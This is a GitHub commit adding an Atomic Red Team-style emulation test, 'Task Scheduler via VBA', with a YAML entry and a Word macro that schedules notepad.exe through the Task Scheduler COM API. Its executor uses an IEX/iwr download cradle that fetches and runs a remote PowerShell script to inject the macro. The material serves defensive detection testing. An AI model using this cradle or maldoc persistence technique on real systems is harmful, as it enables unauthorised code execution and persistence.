Taskscheduler (#1317)
* initial push for T1053.005 (Task Scheduler via VBA) * updates * updates * updates Co-authored-by: avocado <avocados@smuggler.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Ama Smuggle Avocados
committed by
GitHub
GitHub
parent
db96a6f4cf
commit
4fc97b9206
@@ -100,3 +100,33 @@ atomic_tests:
|
||||
Register-ScheduledTask AtomicTask -InputObject $object
|
||||
cleanup_command: |
|
||||
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
|
||||
- name: Task Scheduler via VBA
|
||||
auto_generated_guid:
|
||||
description: |
|
||||
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
|
||||
30 - 40 seconds after this module has run
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ms_product:
|
||||
description: Maldoc application Word
|
||||
type: String
|
||||
default: Word
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Microsoft #{ms_product} must be installed
|
||||
prereq_command: |
|
||||
try {
|
||||
New-Object -COMObject "#{ms_product}.Application" | Out-Null
|
||||
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
|
||||
Stop-Process -Name $process
|
||||
exit 0
|
||||
} catch { exit 1 }
|
||||
get_prereq_command: |
|
||||
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
|
||||
executor:
|
||||
command: |
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
|
||||
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
|
||||
name: powershell
|
||||
@@ -0,0 +1,108 @@
|
||||
Sub Scheduler()
|
||||
|
||||
' Defined in taskschd.h
|
||||
Const TASK_ACTION_EXEC = 0
|
||||
Const TASK_CREATE_OR_UPDATE = 6
|
||||
Const TASK_LOGON_INTERACTIVE_TOKEN = 3
|
||||
|
||||
' https://docs.microsoft.com/en-us/windows/win32/taskschd/trigger-type
|
||||
' if cannot find the header file easily, look at
|
||||
'
|
||||
' https://docs.microsoft.com/en-us/windows/win32/api/taskschd/ne-taskschd-task_trigger_type2
|
||||
'
|
||||
' and start counting from 0 to whatever and that number is the constant
|
||||
Const TASK_TRIGGER_TIME = 1
|
||||
|
||||
Set service = CreateObject("Schedule.Service")
|
||||
Call service.Connect
|
||||
|
||||
Dim rootFolder
|
||||
Set rootFolder = service.GetFolder("\")
|
||||
|
||||
Dim taskDefinition
|
||||
Set taskDefinition = service.NewTask(0)
|
||||
|
||||
Dim regInfo
|
||||
Set regInfo = taskDefinition.RegistrationInfo
|
||||
regInfo.Description = "Start Notepad without UAC"
|
||||
regInfo.Author = "Administrator"
|
||||
|
||||
Dim principal
|
||||
Set principal = taskDefinition.principal
|
||||
principal.logonType = TASK_LOGON_INTERACTIVE_TOKEN
|
||||
|
||||
Dim settings
|
||||
Set settings = taskDefinition.settings
|
||||
settings.Enabled = True
|
||||
settings.StartWhenAvailable = True
|
||||
settings.Hidden = False
|
||||
|
||||
Dim triggers
|
||||
Set triggers = taskDefinition.triggers
|
||||
|
||||
Dim trigger
|
||||
Set trigger = triggers.Create(TASK_TRIGGER_TIME)
|
||||
|
||||
Dim startTime
|
||||
Dim endTime
|
||||
|
||||
Dim time
|
||||
time = DateAdd("s", 10, Now)
|
||||
startTime = XmlTime(time)
|
||||
|
||||
time = DateAdd("m", 2, Now)
|
||||
endTime = XmlTime(time)
|
||||
|
||||
trigger.StartBoundary = startTime
|
||||
trigger.EndBoundary = endTime
|
||||
trigger.ExecutionTimeLimit = "PT5M"
|
||||
trigger.ID = "TimeTriggerId"
|
||||
trigger.Enabled = True
|
||||
|
||||
Dim action
|
||||
Set action = taskDefinition.Actions.Create(TASK_ACTION_EXEC)
|
||||
action.Path = "C:\Windows\System32\notepad.exe"
|
||||
|
||||
On Error Resume Next
|
||||
|
||||
'TaskFolder.RegisterTaskDefinition( _
|
||||
' ByVal path, _
|
||||
' ByVal definition, _
|
||||
' ByVal flags, _
|
||||
' ByVal userId, _
|
||||
' ByVal password, _
|
||||
' ByVal logonType, _
|
||||
' [ ByVal sddl ], _
|
||||
' ByRef task _
|
||||
')
|
||||
|
||||
Call rootFolder.RegisterTaskDefinition("Run Notepad", _
|
||||
taskDefinition, _
|
||||
TASK_CREATE_OR_UPDATE, _
|
||||
, _
|
||||
, _
|
||||
TASK_LOGON_INTERACTIVE_TOKEN)
|
||||
|
||||
On Error GoTo 0
|
||||
|
||||
End Sub
|
||||
|
||||
Function XmlTime(t)
|
||||
|
||||
Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
|
||||
Dim tTime, tDate
|
||||
|
||||
cSecond = "0" & Second(t)
|
||||
cMinute = "0" & Minute(t)
|
||||
CHour = "0" & Hour(t)
|
||||
cDay = "0" & Day(t)
|
||||
cMonth = "0" & Month(t)
|
||||
cYear = Year(t)
|
||||
|
||||
tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
|
||||
":" & Right(cSecond, 2)
|
||||
|
||||
tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
|
||||
XmlTime = tDate & "T" & tTime
|
||||
|
||||
End Function
|
||||
Reference in New Issue
Block a user